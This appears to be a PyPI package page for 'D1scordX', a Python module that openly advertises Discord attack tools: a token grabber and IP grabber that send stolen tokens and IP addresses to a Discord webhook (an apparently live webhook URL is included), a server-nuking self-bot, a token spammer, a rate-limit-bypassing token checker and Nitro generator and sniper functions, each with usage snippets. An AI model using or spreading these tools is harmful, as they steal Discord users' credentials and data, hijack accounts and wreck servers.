D1scordX AIO Module
Project description
Link:
Discord |
YouTube |
Github
Setup
Tips:
- Install module with:
pip install D1scordX
Features:
- CheckTokens | Check a token list from txt file and bypass ratelimit(discord api(not bypassing Cloudflare))
- TokenGrabber | Grab discord token using webhook
- IpGrabber | Grab ip and send to discord webhook
- SelfNukeBot | Nuke discord server with your own account
- TokenSpammer | Spam message with your valid token
- GenerateNitro | Generate nitro and save on a txt file
- NitroSniper | Snipe discord nitro
How to use:
- CheckTokens
from D1scordX import CheckTokens
useragent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'
CheckTokens('filename.txt',useragent)
#in filename.txt we have token(list)
- TokenGrabber
from D1scordX import TokenGrabber
webhook = 'https://discord.com/api/webhooks/826913797411045396/M1J0F8t7ngBLqWY1CEK3dDvCY4eN-YYLwhNkNKJj1MZKOKvwDViHgkqKGSa5TRjownWo'
TokenGrabber(webhook)
- SelfNukeBot
from D1scordX import SelfNukeBot
token = 'token'
prefix = 'bot prefix ex:$'
SelfNukeBot(token,prefix)
- TokenSpammer
from D1scordX import TokenSpammer
TokenSpammer('my token file.txt',channel id (791225898242015255),message to send,10)
ex:TokenSpammer('tokens.txt',791225898242015255,hello world,10)
#in my token file.txt we have token(list)
- GenerateNitro
from D1scordX import GenerateNitro
GenerateNitro('outpout file.txt',count of nitro)
ex:GenerateNitro('mynitro.txt',100)
- **IpGrabber**
```py
from D1scordX import IpGrabber
webhook = 'Your Webhhook Url'
IpGrabber(webhook)
- **NitroSniper**
```py
from D1scordX import NitroSniper
token = 'your token'
NitroSniper(token)
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
D1scordX-0.0.9.tar.gz
(5.7 kB
view details)
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file D1scordX-0.0.9.tar.gz.
File metadata
- Download URL: D1scordX-0.0.9.tar.gz
- Upload date:
- Size: 5.7 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/3.4.1 importlib_metadata/3.7.3 pkginfo/1.7.0 requests/2.25.1 requests-toolbelt/0.9.1 tqdm/4.58.0 CPython/3.7.5
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
22420b39950f2978f52ea83ef8242b7751b8e42d27441809adfd49b81cef8f53
|
|
| MD5 |
313c3debf8cb3852e6e9d01f9f584ba3
|
|
| BLAKE2b-256 |
f2f965a8b5a94c549a93276ea7767ebb91de3919c538cbb0a3b9775972b53e0a
|
File details
Details for the file D1scordX-0.0.9-py3-none-any.whl.
File metadata
- Download URL: D1scordX-0.0.9-py3-none-any.whl
- Upload date:
- Size: 6.7 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/3.4.1 importlib_metadata/3.7.3 pkginfo/1.7.0 requests/2.25.1 requests-toolbelt/0.9.1 tqdm/4.58.0 CPython/3.7.5
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
a14a4564778be224bfbf2ccdf58628e75e2803b4702bf6a1cb7646fcbdaba835
|
|
| MD5 |
572714a19e4507debab4c38e962a2f4a
|
|
| BLAKE2b-256 |
301803dde184bccb77a11705901019536a66873ff3b4a71cf51bed2c4fe06409
|